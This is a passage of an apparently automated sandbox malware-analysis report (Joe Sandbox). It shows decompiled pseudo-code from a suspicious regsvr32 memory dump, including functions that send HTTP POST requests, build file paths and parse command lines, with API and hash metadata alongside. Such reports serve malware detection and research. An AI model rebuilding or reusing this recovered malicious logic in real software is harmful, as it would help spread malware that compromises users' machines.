                                                                                                                                                                                              				_t94 = E042A9DD8(0xb64);
                                                                                                                                                                                              				_v36 = _v36 & 0;
                                                                                                                                                                                              				_t188 = 0x3c;
                                                                                                                                                                                              				_v40 = _t94;
                                                                                                                                                                                              				E042A8D6D( &_v116, 0, 0x100);
                                                                                                                                                                                              				_v108 = 0x10;
                                                                                                                                                                                              				_v112 =  &_v132;
                                                                                                                                                                                              				_v116 = _t188;
                                                                                                                                                                                              				_v100 =  &_v388;
                                                                                                                                                                                              				_v96 = 0x100;
                                                                                                                                                                                              				_v72 =  &_v644;
                                                                                                                                                                                              				_push( &_v116);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_v68 = 0x100;
                                                                                                                                                                                              				_push(E042AA43D(_t190));
                                                                                                                                                                                              				_t102 =  *0x42bf838; // 0x0
                                                                                                                                                                                              				_push(_t190);
                                                                                                                                                                                              				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
                                                                                                                                                                                              					_t104 = 0;
                                                                                                                                                                                              					__eflags = 0;
                                                                                                                                                                                              					_v12 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t105 =  *0x42bf838; // 0x0
                                                                                                                                                                                              						_v8 = 0x8404f700;
                                                                                                                                                                                              						_t189 =  *_t105( *0x42bf920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
                                                                                                                                                                                              						__eflags = _t189;
                                                                                                                                                                                              						if(_t189 != 0) {
                                                                                                                                                                                              							E042AF73E(_t189);
                                                                                                                                                                                              							_t110 =  *0x42bf838; // 0x0
                                                                                                                                                                                              							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
                                                                                                                                                                                              							__eflags = _a24;
                                                                                                                                                                                              							_t165 = _t111;
                                                                                                                                                                                              							if(_a24 != 0) {
                                                                                                                                                                                              								E042AA065(_a24);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t165;
                                                                                                                                                                                              							if(_t165 != 0) {
                                                                                                                                                                                              								__eflags = _v104 - 4;
                                                                                                                                                                                              								_t112 = 0x8484f700;
                                                                                                                                                                                              								if(_v104 != 4) {
                                                                                                                                                                                              									_t112 = _v8;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t115 =  *0x42bf838; // 0x0
                                                                                                                                                                                              								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
                                                                                                                                                                                              								_v8 = _t116;
                                                                                                                                                                                              								__eflags = _a24;
                                                                                                                                                                                              								if(_a24 != 0) {
                                                                                                                                                                                              									E042AA065(_a24);
                                                                                                                                                                                              									_t116 = _v8;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t116;
                                                                                                                                                                                              								if(_t116 != 0) {
                                                                                                                                                                                              									__eflags = _v104 - 4;
                                                                                                                                                                                              									if(_v104 == 4) {
                                                                                                                                                                                              										E042AF6EC(_t116);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t117 = E042A9DD8(0x901);
                                                                                                                                                                                              									_t193 = _t117;
                                                                                                                                                                                              									_v16 = _t193;
                                                                                                                                                                                              									_t119 =  *0x42bf838; // 0x0
                                                                                                                                                                                              									_t194 = _v8;
                                                                                                                                                                                              									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E042AA43D(_t193), _a4, _a8);
                                                                                                                                                                                              									E042A8B9C( &_v16);
                                                                                                                                                                                              									__eflags = _a24;
                                                                                                                                                                                              									if(_a24 != 0) {
                                                                                                                                                                                              										E042AA065(_a24);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _v8;
                                                                                                                                                                                              									if(_v8 != 0) {
                                                                                                                                                                                              										L25:
                                                                                                                                                                                              										_t122 = 8;
                                                                                                                                                                                              										_v24 = _t122;
                                                                                                                                                                                              										_v20 = 0;
                                                                                                                                                                                              										_v16 = 0;
                                                                                                                                                                                              										E042A8D6D( &_v20, 0, _t122);
                                                                                                                                                                                              										_t127 =  *0x42bf838; // 0x0
                                                                                                                                                                                              										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
                                                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                                                              											_t129 = E042A9F6F( &_v20, __eflags);
                                                                                                                                                                                              											__eflags = _t129 - 0xc8;
                                                                                                                                                                                              											if(_t129 == 0xc8) {
                                                                                                                                                                                              												 *_a20 = _t194;
                                                                                                                                                                                              												 *_a12 = _t189;
                                                                                                                                                                                              												 *_a16 = _t165;
                                                                                                                                                                                              												__eflags = 0;
                                                                                                                                                                                              												return 0;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_v12 =  ~_t129;
                                                                                                                                                                                              											L29:
                                                                                                                                                                                              											_t135 =  *0x42bf838; // 0x0
                                                                                                                                                                                              											 *((intOrPtr*)(_t135 + 8))(_t194);
                                                                                                                                                                                              											_t195 = _v12;
                                                                                                                                                                                              											L30:
                                                                                                                                                                                              											__eflags = _t165;
                                                                                                                                                                                              											if(_t165 != 0) {
                                                                                                                                                                                              												_t139 =  *0x42bf838; // 0x0
                                                                                                                                                                                              												 *((intOrPtr*)(_t139 + 8))(_t165);
                                                                                                                                                                                              											}
                                                                                                                                                                                              											__eflags = _t189;
                                                                                                                                                                                              											if(_t189 != 0) {
                                                                                                                                                                                              												_t179 =  *0x42bf838; // 0x0
                                                                                                                                                                                              												 *((intOrPtr*)(_t179 + 8))(_t189);
                                                                                                                                                                                              											}
                                                                                                                                                                                              											return _t195;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										GetLastError();
                                                                                                                                                                                              										_v12 = 0xfffffff8;
                                                                                                                                                                                              										goto L29;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										GetLastError();
                                                                                                                                                                                              										_t143 =  *0x42bf838; // 0x0
                                                                                                                                                                                              										 *((intOrPtr*)(_t143 + 8))(_t194);
                                                                                                                                                                                              										_t145 =  *0x42bf838; // 0x0
                                                                                                                                                                                              										_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              										 *((intOrPtr*)(_t145 + 8))(_t165);
                                                                                                                                                                                              										_t147 =  *0x42bf838; // 0x0
                                                                                                                                                                                              										_t165 = 0;
                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                              										 *((intOrPtr*)(_t147 + 8))(_t189);
                                                                                                                                                                                              										_t194 = _v8;
                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									GetLastError();
                                                                                                                                                                                              									_t153 =  *0x42bf838; // 0x0
                                                                                                                                                                                              									 *((intOrPtr*)(_t153 + 8))(_t165);
                                                                                                                                                                                              									_t155 =  *0x42bf838; // 0x0
                                                                                                                                                                                              									_t165 = 0;
                                                                                                                                                                                              									 *((intOrPtr*)(_t155 + 8))(_t189);
                                                                                                                                                                                              									_t189 = 0;
                                                                                                                                                                                              									_t194 = _v8;
                                                                                                                                                                                              									goto L22;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								GetLastError();
                                                                                                                                                                                              								_t159 =  *0x42bf838; // 0x0
                                                                                                                                                                                              								 *((intOrPtr*)(_t159 + 8))(_t189);
                                                                                                                                                                                              								L21:
                                                                                                                                                                                              								_t189 = 0;
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              						L22:
                                                                                                                                                                                              						_t186 = _t194;
                                                                                                                                                                                              						_t104 = _v12 + 1;
                                                                                                                                                                                              						_v12 = _t104;
                                                                                                                                                                                              						__eflags = _t104 - 2;
                                                                                                                                                                                              					} while (_t104 < 2);
                                                                                                                                                                                              					__eflags = _t186;
                                                                                                                                                                                              					if(_t186 != 0) {
                                                                                                                                                                                              						goto L25;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t195 = 0xfffffffe;
                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t163 = 0xfffffffc;
                                                                                                                                                                                              				return _t163;
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x042af958
                                                                                                                                                                                              0x042af95e
                                                                                                                                                                                              0x042af964
                                                                                                                                                                                              0x042af967
                                                                                                                                                                                              0x042af96c
                                                                                                                                                                                              0x042af96f
                                                                                                                                                                                              0x042af972
                                                                                                                                                                                              0x042af974
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042af974
                                                                                                                                                                                              0x042af900
                                                                                                                                                                                              0x042af900
                                                                                                                                                                                              0x042af906
                                                                                                                                                                                              0x042af90c
                                                                                                                                                                                              0x042af9fc
                                                                                                                                                                                              0x042af9fc
                                                                                                                                                                                              0x042af9fc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042af9fc
                                                                                                                                                                                              0x042af8fe
                                                                                                                                                                                              0x042af8bf
                                                                                                                                                                                              0x042af9fe
                                                                                                                                                                                              0x042afa01
                                                                                                                                                                                              0x042afa03
                                                                                                                                                                                              0x042afa06
                                                                                                                                                                                              0x042afa09
                                                                                                                                                                                              0x042afa09
                                                                                                                                                                                              0x042afa12
                                                                                                                                                                                              0x042afa14
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042afa18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042afa18
                                                                                                                                                                                              0x042af88e
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 042AF7D7
                                                                                                                                                                                              • memset.MSVCRT ref: 042AF7E8
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 042AF8BF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast
                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                              • API String ID: 2570506013-1814004025
                                                                                                                                                                                              • Opcode ID: 4dd1cca93930c6b0898d3180ea325c587efb2d45b0903db7f2fd069183521290
                                                                                                                                                                                              • Instruction ID: 9ea07c55d7c63828ea5b83dbb9cc23f08703cf5b0dc80c71f34e0cd03ebba13a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dd1cca93930c6b0898d3180ea325c587efb2d45b0903db7f2fd069183521290
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DA19171B10219EFDB10EFA8E948AEE77B8EF08314F114469F905E7250D778AE55CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _snprintfqsort
                                                                                                                                                                                              • String ID: %I64d$false$null$true
                                                                                                                                                                                              • API String ID: 756996078-4285102228
                                                                                                                                                                                              • Opcode ID: 6e5a9e7886dca1bf57d0fcb7acf9d82e22841c67d5ff0632b7d06565b1a8a245
                                                                                                                                                                                              • Instruction ID: 5953ca91553a4706ff5e55b61f80aa83d2e387b91b76a4d6a56f773d33a7ac9f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e5a9e7886dca1bf57d0fcb7acf9d82e22841c67d5ff0632b7d06565b1a8a245
                                                                                                                                                                                              • Instruction Fuzzy Hash: 26E15BB2B2020ABBEF159E64DC55EFB3B69EF043C4F008015FD9596140E671EA719BE1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E042A50B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                                                                                                                                                                              				void _v532;
                                                                                                                                                                                              				char _v548;
                                                                                                                                                                                              				char _v580;
                                                                                                                                                                                              				char _v584;
                                                                                                                                                                                              				signed int _v588;
                                                                                                                                                                                              				intOrPtr _v592;
                                                                                                                                                                                              				WCHAR* _v596;
                                                                                                                                                                                              				char _v600;
                                                                                                                                                                                              				intOrPtr _v604;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                              				char _t63;
                                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              				void* _t77;
                                                                                                                                                                                              				signed int _t78;
                                                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                                                              				WCHAR* _t84;
                                                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                                                              				intOrPtr _t95;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                                                              				signed char _t104;
                                                                                                                                                                                              				void* _t107;
                                                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                                                              				intOrPtr _t110;
                                                                                                                                                                                              				void* _t113;
                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                              				WCHAR* _t115;
                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                              				WCHAR* _t130;
                                                                                                                                                                                              				intOrPtr _t142;
                                                                                                                                                                                              				void* _t143;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				signed int _t166;
                                                                                                                                                                                              				void* _t167;
                                                                                                                                                                                              				void* _t169;
                                                                                                                                                                                              				void* _t173;
                                                                                                                                                                                              				signed int _t174;
                                                                                                                                                                                              				WCHAR* _t176;
                                                                                                                                                                                              				signed int _t177;
                                                                                                                                                                                              				signed int _t178;
                                                                                                                                                                                              				intOrPtr* _t180;
                                                                                                                                                                                              				signed int _t182;
                                                                                                                                                                                              				void* _t185;
                                                                                                                                                                                              				void* _t186;
                                                                                                                                                                                              				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x42bf81c; // 0x48efbe8
					_t5 = _t108 + 0x110; // 0x48f16b8
					_t110 =  *0x42bf820; // 0x48efaa0
					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
				}
				if(E042AC9F4(_t173) != 0) {
					L4:
					_t56 = E042AC6CE();
					_push(_t113);
					_v592 = _t56;
					E042AC4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E042A5072( &_v580,  &_v580, _t190);
					_t126 = E042AE2C5( &_v580, E042AA43D( &_v580), 0);
					E042AC6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E042A317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x42bc9a0);
						_t115 = E042A9A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x42bf81c; // 0x48efbe8
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E042A98BD(_v600);
								_t130 = _t115;
								 *0x42bf8d8 = _t66;
								 *0x42bf8d0 = E042A98BD(_t130);
								L17:
								_push(_t130);
								_t174 = E042AA633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x42bc9f2);
								_t163 = 0xe;
								E042AAAA3(_t163, _t192);
								E042AAADC(_t174, _t192, _t115);
								_t180 = _a4;
								_push( *_t180);
								E042AAA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E042AB025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E042AB025(_t166, _t192);
								}
								_t76 = E042AA065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E042AAA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x42bf81c; // 0x48efbe8
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E042B0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x42bf81c; // 0x48efbe8
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E042AF0DE(_t169);
										}
										E042A584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x42bf81c; // 0x48efbe8
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E042A109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E042A8BAF( &_v596);
												 *_t187 = 0x42bc9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x42bc9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x48efe10
									_t142 = _t40;
									L25:
									_t78 = E042A5AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x42bf81c; // 0x48efbe8
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E042AD11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x42bf818; // 0x48ef8b0
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x42bf818; // 0x48ef8b0
								 *((intOrPtr*)(_t97 + 0x30))();
								E042A8BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E042A8BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t18 = _t65 + 0x1898; // 0x0
						_t104 =  *_t18;
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
                                                                                                                                                                                              							L11:
                                                                                                                                                                                              							E042AF1F6(_v600, _t161);
                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E042AF1B6(_v600,  &_v580);
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0xfffffffe);
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t107 = E042A3097( &_v532, _t178, 0x105);
                                                                                                                                                                                              					_t190 = _t107;
                                                                                                                                                                                              					if(_t107 == 0) {
                                                                                                                                                                                              						L41:
                                                                                                                                                                                              						E042A5F6F( &_v588);
                                                                                                                                                                                              						_t72 = _t178;
                                                                                                                                                                                              						L42:
                                                                                                                                                                                              						return _t72;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


























































                                                                                                                                                                                              0x042a518a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a518a
                                                                                                                                                                                              0x042a52db
                                                                                                                                                                                              0x042a51de
                                                                                                                                                                                              0x042a51ec
                                                                                                                                                                                              0x042a51ff
                                                                                                                                                                                              0x042a5204
                                                                                                                                                                                              0x042a520a
                                                                                                                                                                                              0x042a520c
                                                                                                                                                                                              0x042a5224
                                                                                                                                                                                              0x042a5229
                                                                                                                                                                                              0x042a5232
                                                                                                                                                                                              0x042a5238
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a5238
                                                                                                                                                                                              0x042a5214
                                                                                                                                                                                              0x042a521d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a521d
                                                                                                                                                                                              0x042a51b1
                                                                                                                                                                                              0x042a51b1
                                                                                                                                                                                              0x042a51b7
                                                                                                                                                                                              0x042a51b9
                                                                                                                                                                                              0x042a51c6
                                                                                                                                                                                              0x042a51c8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a51ca
                                                                                                                                                                                              0x042a51ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a51ce
                                                                                                                                                                                              0x042a51bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a51bf
                                                                                                                                                                                              0x042a5188
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a5113
                                                                                                                                                                                              0x042a511e
                                                                                                                                                                                              0x042a5124
                                                                                                                                                                                              0x042a5126
                                                                                                                                                                                              0x042a53b5
                                                                                                                                                                                              0x042a53b9
                                                                                                                                                                                              0x042a53be
                                                                                                                                                                                              0x042a53c0
                                                                                                                                                                                              0x042a53c6
                                                                                                                                                                                              0x042a53c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a5126

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1985475764-0
                                                                                                                                                                                              • Opcode ID: b49297445f8d9715323957abbf35b49934de3f5e28eed625b3e0e3f95a440690
                                                                                                                                                                                              • Instruction ID: 67f4b0936a237e58c199b73ba0157bd481857956129af016441ffafd92f42639
                                                                                                                                                                                              • Opcode Fuzzy Hash: b49297445f8d9715323957abbf35b49934de3f5e28eed625b3e0e3f95a440690
                                                                                                                                                                                              • Instruction Fuzzy Hash: B681DE71724301ABE714EB24E848B7FB3E5EFC4318F14492DED558B280EFB4B9958A81
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E042ADE26(WCHAR* __ecx) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				WCHAR* _v12;
                                                                                                                                                                                              				WCHAR* _v16;
                                                                                                                                                                                              				WCHAR* _v140;
                                                                                                                                                                                              				WCHAR* _v144;
                                                                                                                                                                                              				short _v664;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                              				signed int _t30;
                                                                                                                                                                                              				WCHAR* _t36;
                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                              				signed int _t41;
                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                              				WCHAR* _t49;
                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                              				WCHAR* _t52;
                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                              				_t51 = 0;
                                                                                                                                                                                              				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                                              				_t44 = _v8;
                                                                                                                                                                                              				_t41 = 0;
                                                                                                                                                                                              				_v12 = _t28;
                                                                                                                                                                                              				if(_t44 <= 0) {
                                                                                                                                                                                              					L22:
                                                                                                                                                                                              					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                                              					__eflags = _t29;
                                                                                                                                                                                              					return _t29;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					L1:
                                                                                                                                                                                              					_t49 =  *(_t28 + _t41 * 4);
                                                                                                                                                                                              					_t30 =  *_t49 & 0x0000ffff;
                                                                                                                                                                                              					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                                                                                                              						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                                                                                                              						_t40 = lstrlenW(_t49);
                                                                                                                                                                                              						_t45 = 0;
                                                                                                                                                                                              						if(_t40 <= 0) {
                                                                                                                                                                                              							L11:
                                                                                                                                                                                              							_t44 = _v8;
                                                                                                                                                                                              							_t51 = _t51 + 1;
                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							L8:
                                                                                                                                                                                              							if(_t49[_t45] == 0x2c) {
                                                                                                                                                                                              								_t49[_t45] = 0;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t45 = _t45 + 1;
                                                                                                                                                                                              						} while (_t45 < _t40);
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              					_t28 = _v12;
                                                                                                                                                                                              					_t41 = _t41 + 1;
                                                                                                                                                                                              				} while (_t41 < _t44);
                                                                                                                                                                                              				if(_t51 != 1) {
                                                                                                                                                                                              					if(__eflags <= 0) {
                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t52 = _v140;
                                                                                                                                                                                              					L17:
                                                                                                                                                                                              					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                                                                                                              						lstrcpynW(_v16, _t52, 0x104);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                              						_push(_t52);
                                                                                                                                                                                              						_push(0x42bc9a0);
                                                                                                                                                                                              						_t36 = E042A9A5A( &_v664);
                                                                                                                                                                                              						_v12 = _t36;
                                                                                                                                                                                              						lstrcpynW(_v16, _t36, 0x104);
                                                                                                                                                                                              						E042A8BF4( &_v12, 0xfffffffe);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t52 = _v144;
                                                                                                                                                                                              				goto L17;
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 042ADE3B
                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 042ADE46
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 042ADE88
                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 042ADEE1
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 042ADF06
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104), ref: 042ADF24
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1259063344-0
                                                                                                                                                                                              • Opcode ID: 0b225568d9da196e600305a2cc9887740f6375f5e072ee335ac5d99624e0ed25
                                                                                                                                                                                              • Instruction ID: 54089148813bbe634520ed6806bbe8181468be5c5b30c1827754d2ae60373ddb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b225568d9da196e600305a2cc9887740f6375f5e072ee335ac5d99624e0ed25
